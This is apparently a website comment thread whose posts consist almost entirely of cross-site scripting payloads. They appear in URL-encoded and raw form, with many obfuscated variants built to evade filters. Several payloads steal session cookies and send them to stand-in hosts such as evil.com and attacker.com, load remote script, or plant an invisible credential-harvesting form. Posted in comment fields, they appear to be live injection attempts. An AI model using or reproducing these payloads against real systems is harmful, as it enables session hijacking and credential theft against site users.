%2578%2532%2532%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2532%2566%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2566%253b%2526%2523%2578%2536%2564%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2532%2538%253b%2526%2523%2578%2533%2534%253b%2526%2523%2578%2532%2539%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2532%2566%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%0A%2525%2532%2532%2525%2533%2565%2525%2533%2563%2525%2532%2566%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%2525%2533%2563%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%2525%2537%2530%2525%2537%2532%2525%2536%2566%2525%2536%2564%2525%2537%2530%2525%2537%2534%2525%2532%2538%2525%2533%2534%2525%2532%2539%2525%2533%2563%2525%2532%2566%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%0A%3Cimg%20src%3D1%20onerror%3Dalert%28document.domain%29%3E%0A%3C%3E%3Cimg%20src%3D1%20onerror%3Dalert%283%29%3E%0A%7B%7B%24on.constructor%28%27alert%284%29%27%29%28%29%7D%7D%0Ajavascript%3Aalert%28document.cookie%29%0A%22%3E%3Csvg%3E%3Canimatetransform%20onbegin%3Dalert%285%29%3E%0A%27%3E%22%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%2Fsrc%3Dattacker.com%2Fjs%3E%3C%2Fscript%3E%0A%3Fmsg%3D%3Cimg%2Fsrc%3D%60%2500%60%2520onerror%3Dthis.onerror%3Dconfirm%286%29%0A%26%2527%7D%2Cx%3Dx%3D%253E%7Bthrow%2F%2A%2A%2Fonerror%3Dalert%2C1337%7D%2CtoString%3Dx%2Cwindow%252b%2527%2527%2C%7Bx%3A%2527%0A%26toString%28%29.constructor.prototype.charAt%253d%5B%5D.join%3B%5B7%5D%7CorderBy%3AtoString%28%29.constructor.fromCharCode%28120%2C61%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%29%3D1%0A%3Csvg%2Fonload%3Deval%28atob%28%E2%80%98YWxlcnQoJ1hTUycp%E2%80%99%29%29%3E%0A%3Csvg%2Fonload%3Deval%28atob%28%E2%80%98YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D%E2%80%99%29%29%3E%0Ahttp%3A%2F%2Ffoo%3F%26apos%3B-alert%288%29-%26apos%3B%0A%3C%2Ftextarea%3E%3CScRiPt%3Eprompt%28%2Fhack%20the%20planet%2F%29%3C%2FScRiPt%2F%2F%0A22%253E%253C%2Fscript%253E%253Csvg%2520onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%253E%0A%3Ciframe%20src%3D%22https%3A%2F%2FYOUR-LAB-ID.web-security-academy.net%2F%23%22%20onload%3D%22this.src%2B%3D%27%3Cimg%20src%3Dx%20onerror%3Dprint%28%29%3E%27%22%3E%3C%2Fiframe%3E%0A%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%26token%3D%3Bscript-src-elem%2520%2527unsafe-inline%2527%0A%2522%253E%253C%2Fscript%253E%253Csvg%2520onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%253E%253C%2Ftextarea%253E%253CScRiPt%253Eprompt%28document.cookie%29%253C%2FScRiPt%2F%2F%0Adz7b%27-prompt%281%29-%27nrito%0A%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E%0A%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%282%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E%0A%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%28document.cookie%29%26amp%3Bgt%3B%3E%22%3E%20%0A%3Cimage%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimage%3E%0A%22%3E%3C%21%27%2F%2A%22%2A%5C%27%2F%2A%5C%22%2F%2A--%3E%3C%2FScript%3E%3CImage%20SrcSet%3DK%20%2A%2F%3B%20OnError%3Dconfirm%28document.domain%29%20%2F%2F%3E%23%0Ajavascript%253avar%7Ba%253aonerror%7D%253d%7Ba%253aalert%7D%253bthrow%252520document.cookie%0A%22%5C%2F%3E%3Cimg%2520s%2Bsrc%2Bc%3Dx%2520on%2Bonerror%2B%2520%3D%22alert%281%29%22%5C%3E%0A%3Cscript%3Ealert%28document.getElementsByTagName%28%27html%27%29%5B0%5D.innerHTML.match%28%2F%27%28%5B%5E%27%5D%252b%29%2F%29%5B1%5D%29%3C%2Fscript%3E%0A%3Cscript%3Ealert%28document.getElementsByTagName%28%27html%27%29%5B0%5D.innerHTML.match%28%2F%27%28%5B%5E%27%5D%252b%29%2F%29%5Bdocument.domain%5D%29%3C%2Fscript%3E%0Ajavascript%3Aalert%28document.domain%29%0A%3C%2FTextarea%2F%3C%2FNoscript%2F%3C%2FPre%2F%3C%2FXmp%3E%3CSvg%20%2FOnload%3Dconfirm%28document.domain%29%3E%0A%3Cscript%3Ealert%28document.head.innerHTML.substr%2877%2C%2097%2C%20120%29%29%3B%3C%2Fscript%3E%0A%3Ciframe%20srcdoc%3D%27%3Cbody%20onload%3Dprompt%26lpar%3B51%26rpar%3B%3E%27%3E%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0A%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E%0A%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%282%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E%0A%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%28document.cookie%29%26amp%3Bgt%3B%3E%22%3E%0A%22%3E%3Cu%3EXSS%20Vulnerability%3C%2Fu%3E%3Cmarquee%2Bonstart%3D%27alert%28document.cookie%29%27%3EXSS%0A%20%3Cimg%20src%3D%22https%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg%22%20width%3D%22500%22%20height%3D%22600%22%3E%0A%3Cimg%2Fsrc%2Foneror%3Dalert%28document%5B%27domain%5D%29%3E%0Ajavascript%3A%2F%2F%250aalert%281%29%0A%257B%257Bconstructor.constructor%28%2527alert%281337%29%2527%29%28%29%257D%257D%0A%E2%80%9C%3E%3CsVg%2FOnLuFy%3D%E2%80%9DX%3Dy%E2%80%9DoNloaD%3D%3B1%5Econfirm%281%29%3E%2F%60%60%C2%B9%2F%2F%0A%3Cscript%3E%7Bonerror%3Deval%7Dthrow%27%3Dalert%5Cx281337%5Cx29%27%3C%2Fscript%3E%0A%3Cscript%3Ethrow%20onerror%3Dalert%2C%27some%20string%27%2C123%2C%27haha%27%3C%2Fscript%3E%0A%3Cscript%3E%7Bonerror%3Deval%7Dthrow%7BlineNumber%3A1%2CcolumnNumber%3A1%2CfileName%3A1%2Cmessage%3A%27alert%5Cx281%5Cx29%27%7D%3C%2Fscript%3E%0A%3Cscript%3Ethrow%2Fa%2F%2CUncaught%3D1%2Cg%3Dalert%2Ca%3DURL%2B0%2Conerror%3Deval%2C%2F1%2Fg%2Ba%5B12%5D%2B%5B1337%5D%2Ba%5B13%5D%3C%2Fscript%3E%0A%3Cscript%3ETypeError.prototype.name%20%3D%27%3D%2F%27%2C0%5Bonerror%3Deval%5D%5B%27%2F-alert%281%29%2F%2F%27%5D%3C%2Fscript%3E%0A%22%3E%3CBODy%20onbeforescriptexecute%3D%22x1%3D%27cookie%27%3Bc%3D%27%29%27%3Bb%3D%27a%27%3Blocation%3D%27jav%27%2Bb%2B%27script%3Acon%27%2B%27fir%5Cu006d%28%27%2B%27document%27%2B%27.%27%2Bx1%2Bc%22%3E%0Axyz%22%2Fng-click%3D%22constructor.c%0AX-Forwarded-Host%3A%20bing.com%22%3E%3Cimg%20src%2Fonerror%3Dalert%284%29%3E%0A%253CA%2520HREF%253d%2522http%253a%252f%252fevil.com%2522%253EClick%2520Here%253C%252fA%253E%0A%3Cform%20action%3D%22%2F%2Fevil.com%22%20method%3D%22GET%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22u%22%20style%3D%27opacity%3A0%3B%27%3E%3Cinput%20type%3D%22password%22%20name%3D%22p%22%20style%3D%27opacity%3A0%3B%27%3E%3Cinput%20type%3D%22submit%22%20name%3D%22s%22%20value%3D%22Load%20more%20content%22%3E%20%22%0A%3Ca%20href%3Dj%26%2397v%26%2397script%3A%26%2397lert%28document.cookie%29%3EClickMe%3C%2Fa%3E%0A%27%3C00%20foo%3D%22%3Ca%2520href%3D%22javascript%3Aalert%28%27XSS-Bypass%27%29%22%3EXSS-CLick%3C%2F00%3E--%2520%2F%0A%3Cmath%3E%3Cmtext%3E%3Ctable%3E%3Cmglyph%3E%3Cstyle%3E%3C%21%5BCDATA%5B%3C%2Fstyle%3E%3Cimg%20title%3D%22%5D%5D%26gt%3B%26lt%3B%2Fmglyph%26gt%3B%26lt%3Bimg%26Tab%3Bsrc%3D1%26Tab%3Bonerror%3Dalert%28%22Mr_Mian%22%29%26gt%3B%22%3E%0A%253Csvg%2520onload%3D%250Aalert%60xss-found%60%253E%0A%3Csvg%2Fonload%3D%5Cu0061lert%28String.fromC%5Cu0061rCode%2888%2C83%2C83%29%29%3E%0A%2B91%2097xxxx7x7%3Bphone-context%3D%26phone-%20context%3D%2B9739343777%0A%2B91%2097xxxx7x7%3Bext%3D1%3Bext%3D2%0A%2B91%2097xxxx7x7%3Bphone-context%3D%27%20OR%201%3D1%3B%20-%0A%2B91%2097xxxx7x7%3Bphone-context%3D%7B%7B4%2A4%7D%7D%7B%7B5%2B5%7D%7D%0A%2B91%2097xxxx7x7%3Bphone-context-burpcollaborator.net%0Athis%5BString.fromCharCode%2897%2C%20108%2C%20101%2C%20114%2C%20116%29%5D%28String.fromCharCode%2872%2C%20101%2C%20108%2C%20108%2C%20111%2C%2033%29%29%3B%0Athis%5B%22al%22%2B%22ert%22%5D%6000%60%20%0Athis%5B%27al%5Cx65rt%27%5D.bind%28this%29%28%27Hello%2C%20World%21%27%29%3B%20%0A%2B%5B%5D%5B%22fill%22%5D%5B%22constructor%22%5D%28%22alert%280%29%22%29%28%29%3B%0Athis%5B%27ale%5Cx72t%27%5D%280%2B0%29%3B%0Athis%5B%27al%27%20%2B%20%27ert%27%5D.call%28this%2C%200%20%2B%200%29%3B%0A%21function%28%29%7B%20this%5B%27al%5Cx65rt%27%5D%280%20%2B%200%29%3B%20%7D%28%29%3B%0A%2Bself%5B%2F%2Afoo%2A%2F%27alert%27%2F%2Abar%2A%2F%5D%28self%5B%2F%2Afoo%2A%2F%27document%27%2F%2Abar%2A%2F%5D%5B%27domain%27%5D%29%2F%2F%0A0..toLocaleString%5B%27constructor%27%5D%60alert%280%29%60%28%29%3B%0Afoo%22%3E%3CsvG%2FonLoAd%3Dconfirm%281337%29%3E%0A%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E%0A%22%3E%5D%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E%0A%2B9739343777%3Bphone-context%3D%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0A%22%5Cu003e%5Cu003cimg%20src%3D1%20onerror%3Dalert%280%29%5Cu003e%0A%22%3E%3CSvg%20Only%3D1%20OnLoad%3Dconfirm%28atob%28%22Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ%3D%3D%22%29%29%3E%0A%3Cdetails%2Fopen%3D%2FOpen%2Fhref%3D%2Fdata%3D%2Bontoggle%3D%22%28alert%29%28document.domain%29%0A%E2%80%9C%3E%3Csv%5Cu01234%5Cg%5Cu01235%2Fon%5Cu01236load%3Dconfirm%281%29%3E%0A%22%3E%3Csv%5Cu01234%5Cg%2Bs%5C01235%5Cvg%2B%5C01236%5Csvg%0A%5Cu01237%5C%2F%20----%3E%20%5C%2F%5Cu01237%5C%2F%5C%20----%3E%20%2F%5Cu01237%5C%2F%20----%3E%20%2F%0AOn%5Cu01234%5Cload%20----%3E%20On%5Cu01234%5C%2BOnLoAd%20----%3E%20onload%0A%22%5C%2F%3E%3Cimg%2520s%2Bsrc%2Bc%3Dx%2520on%2Bonerror%2B%2520%3D%22alert%281%29%22%5C%3E%0AVR11%3Donfocus%3D%27%60%26VR12%3D%60%3Balert%2F%2A%26VR13%3D%2A%2F%281%29%27a%3D%27%26VR14%3D%27autofocus%0Ajavascript%3A%2561lert%281%29%0Ajavascript%3A%26%2337%26%2354%26%2349lert%281%29%0Ajavascript%3A%2526%252337%2526%252354%2526%252349lert%281%29%0A%22AutoFocus%2F%3E%2FOnFocus%3Dtop%3F.%5B%22ale%22%2B%22rt%22%5D%281%29%2F%22%0A%3Ca%2Fhref%3D%E2%80%9Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Basc%26Tab%3Bri%26Tab%3Bpt%3Aalert%26lpar%3B1%26rpar%3B%E2%80%9D%3E%0A%3Cs%5CCr%5Cipt%5C%3Ealert%28document%5C.cookie%29%3C%5C%2Fs%5CCr%5Cipt%5C%3E%5C%3B%5C%2F%3E%0A%3C%3C%2Fdiv%3Escript%3C%2Fdiv%3E%3Ealert%28%29%3C%3C%2Fdiv%3E%2Fscript%3C%2Fdiv%3E%3E%0A%3CSvg%20Only%3D1%20OnLoad%3Dconfirm%28atob%28%22Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ%3D%3D%22%29%29%3E%0A%3CJavaScript%3A%22%5C74Svg%5C57OnLoad%5C75%5C141%5C154%5C145%5C162%5C164%5C501%5C51%5C76%22%2FContentEditable%2FAutoFocus%2FOnFocus%3Dlocation%3DtagName%3E%0A%27%3Balert%28%228%22%29%250D%2F%2F%0Aonload%3D%22alert%28document.domain%29%0Akuromatae%22%3E%3Ctextarea%2Fonbeforeinput%3Dkuro%3D%26%23x27%3B%2F%2Fdomain.tld%26%23x27%3B%3Bimport%28kuro%29%2509autofocus%2509x%3E%0A%3CSvG%3E%3Cset%250Aonbegin%250A%3D%250aa%3Dconfirm%3Ba%2528%2560xss%2560%29%2Fx%3E%0A%3Csvg%3Cscript%3E%20onmou%3Cscript%3Eseover%3C%2Fscript%3E%3D%22alert%28%27xss%27%29%22%3Ehii%3C%2Fsvg%3C%2Fscript%3E%3E%0A%22%3E%3CHTML%20onmouSeovEr%3Dconfirm%28document.cookie%29x%3E%0A%3Ca%20style%3D%22position%3A%20fixed%3B%20top%3A%200%3B%20left%3A%200%3B%20z-index%3A%2099999%3B%20width%3A%20100%25%3B%20height%3A%20100%25%3B%22%20onmouseover%3Dalert%281%29%3E%0A%3Cscript%3Econst%20getCookieValue%3D%28name%29%3D%3E%28document.cookie.match%28%22%28%5E%7C%3B%29%5C%5Cs%2A%22%20%2B%20name%20%2B%20%22%5C%5Cs%2A%3D%5C%5Cs%2A%28%5B%5E%3B%5D%2B%29%22%29%3F.pop%28%29%20%7C%7C%20%22%22%29%3Bfetch%28%22http%3A%2F%2Fevil.com%3A1337%2Fdrop%3Fc%3D%22%20%2B%20getCookieValue%28%22PHPSESSID%22%29%29%3C%2Fscript%3E%0A%3C%3Cscript%3Escript%3Ealert%281%29%3C%3C%2Fscript%3E%2Fscript%3E%0A%3Csvg%3E%3Canimatetransform%20onbegin%3Dprint%28%29%3E%0A%2526%252302java%2526%2523115cript%3Aalert%28document.domain%29%0A%3CdETAILS%250aopen%250aonToGgle%250a%253d%250aa%253dprompt%2Ca%28origin%29%2520x%3E%0A%5Cu003cimg%5Cu0020src%5Cu003dx%5Cu0020onerror%5Cu003d%5Cu0022confirm%28document.domain%29%5Cu0022%5Cu003e%0AFUZZ%22%2527%22%3E%3Cxmp%3E%3Cp%2Btitle%253D%22%3C%252Fxmp%3E%3Cscript%3Ealert%28document.cookie%29%3C%252Fscript%3E%3E%0A%23%22%3E%3C%2Fdiv%3E%3Ca%20href%3D%20javascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bdomain%29%0A%22onfocus%3D%22prompt%28document.cookie%29%22autofocus%3D%E2%80%9D%0AJorge%2BRodriguez-p3axusnf%3Cimg%2Fsrc%3D%7D%29%3Balert%28%29%0Adata-%27%3Balert%28%27XSS%20by%20Jorge%27%29%22%3E-%3Cimg%20src%20onerror%3D%22test%3D%E2%80%99%0A%3C%2Fbase%3C%2FsTyle%2F%3C%2FscRIpt%2F%3C%2FtextArea%2F%3C%2FnoScript%2F%3C%2FtiTle%2F--%3E%EF%BC%9Ch1%2F%3Ch1%3E%3Cimage%2Fonerror%3D%22import%28%27data%3Aapplication%2Fjavascript%3Bcharset%3Dutf-8%3Bbase64%2CYWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v%27%29%2F%2F%2527%22src%3E%3Cscript%3E%0A%3Ca%20href%3Djavascript%3Aalert%288%29%3C%2Fa%3E%0A%5Cu0022%5Cu003c%2526quot%3B%2526gt%3B%2526lt%3B%22%27%3B%7D%7D%3B%E2%80%9C%3E%3C%2FSCRIPT%3E%3Cimg%20src%3Dx%20onerror%3Dalert%2869%29%3E%24%7B%7B7%2A7%7D%7D%0A%3Cp%3E%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3E%3Cstrong%3EClick%20ME%3C%2Fstrong%3E%3C%2Fspan%3E%3C%2Fp%3E%0A%5C%22%3E%3Csvg%3E%3Canimate%20onbegin%3Dprompt%28document.cookie%29%20attributeName%3Dx%20dur%3D1s%3E%0A%2527%3B%7D%29%3Balert%28%2527Ramen%2527%29%3B%24%28picker%29.on%28%2527Noodles%2527%2C%2520function%28result%29%2520%7B%2520var%2520XSS%3D%2527%0A%3C%25s%25v%25g%2B%25on%25l%25oad%25%3Dc%25o%25nf%25i%25rm%25%281%25%29%3E%0Ajavascript%253avar%7Ba%253aonerror%7D%253d%7Ba%253aalert%7D%253bthrow%252520document.cookie%0A%5Cu003cimg%5Cu0020src%5Cu003dx%5Cu0020onerror%5Cu003d%5Cu0022confirm%28document.cookie%29%5Cu0022%5Cu003e%0A%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%E2%80%99%5Cu0061lert%281%29%E2%80%99%3E%0Ajavascript%3Aeval%28%27con%27%2B%27fi%27%2B%27rm%28doument.domain%29%27%29%0A%253c%2573%2576%2567%252f%256f%256e%256c%256f%2561%2564%253d%2570%2572%256f%256d%2570%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529%253e%0A%3Cbutton%20onclick%3D%22alert%281%29%22%3EClick%20me%2C%20please%3C%2Fbutton%3E%0A%3Ciframe%20srcdoc%3D%22%26lt%3Bscript%3Ealert%281%29%26lt%3B%2Fscript%3E%22%3E%3C%2Fiframe%3E%0A%3Ciframe%20src%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fiframe%3E%0A%26%23106avascript%26colon%3Bconfirm%281%29%0A%3Ca%20href%3D%22%26%23106avascript%26colon%3Balert%281%29%22%3Eclick%20me%3C%2Fa%3E%0Ajavascript%3A%2F%2Fhuli.tw%2F%250aalert%281%29%0Ajavascript%3Aalert%40github.com%2F%23%3A%2F%2F%0Ajavascript%3Aalert%2528%2527Slonser%2520was%2520here%2521%2527%2529%253B%252F%252F%40github.com%23%3Balert%2810%29%3B%3A%2F%2Feow5kas78d0wlv0.m.pipedream.net%2527%0AJaVaScRiP%250at%3Aalert%28document.domain%29%0A%3C%21--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E--%3E%0A%3Cdiv%3E%3Ciframe%20src%3Dhttps%3A%2F%2Fexample.com%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0A%3C%21--%20foo%3D%22bar--%3E%3Cs%3EHi%3C%2Fs%3E%22%20--%3E%0Ahttps%3A%2F%2Fassets.matters.news%2Fprocessed%2F1080w%2Fembed%2Ftest%20style%3Danimation-name%3Aspinning%20onanimationstart%3Dalert%281337%29%0A%3Cscript%20nonce%3Da2b5zsa19c%3Ealert%281%29%3C%2Fscript%3E%0A%3Cstyle%3E%3Ca%20id%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fa%3E%3C%2Fstyle%3E%0A%3Csvg%3E%3C%2Fp%3E%3Cstyle%3E%3Ca%20id%3D%22%3C%2Fstyle%3E%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E%22%3E%0A%3Cdetails%2Fopen%3D%2FOpen%2Fhref%3D%2Fdata%3D%3B%20ontoggle%3D%22%28alert%29%28document.domain%29%0Axss%22%3E%3Cinput%2520type%3Dhidden%2520oncontentvisibilityautostatechange%3Dalert%3F.%2526lpar%3B%29%2520style%3Dcontent-visibility%3Aauto%3E%0A%0A%0A%0A%0A%0A%0A Reply Reply as... Cancel
Kiko Kikiki Eugene Belford 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\ "/>x div# javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/> javascript:alert(document.domain) Reply Reply as... Cancel
Kiko Kikiki 3 Months Ago "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') Reply Reply as... Cancel koko kiki Kiko Kikiki 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size] "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"> </inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT; "onmouseover="alert(1) \"-alert(2)}// ${alert(3)} "><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)> <Svg Only=1 Onload="window.location='https://google.com'+document.cookie"> "/><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> "><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> <SVG/oNIY=1 ONLOAD=confirm(document.domain)> http://example.com%22%22,%7D)%3C/script%3E%3Csvg+onload=confirm(location)%3E "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> %26%23%78%32%32%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%37%30%3b%26%23%78%37%32%3b%26%23%78%36%66%3b%26%23%78%36%64%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%34%3b%26%23%78%32%39%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b %25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%34%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65 <img src=1 onerror=alert(document.domain)> <><img src=1 onerror=alert(3)> {{$on.constructor('alert(4)')()}} javascript:alert(document.cookie) "><svg><animatetransform onbegin=alert(5)> '>"></title></style></textarea></script><script/src=attacker.com/js></script> ?msg=<img/src=`%00`%20onerror=this.onerror=confirm(6) &%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 &toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> http://foo?'-alert(8)-' </textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt// 22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> %3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27 %22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt// dz7b'-prompt(1)-'nrito <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> <image src=1 href=1 onerror="javascript:alert(1)"></image> "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> 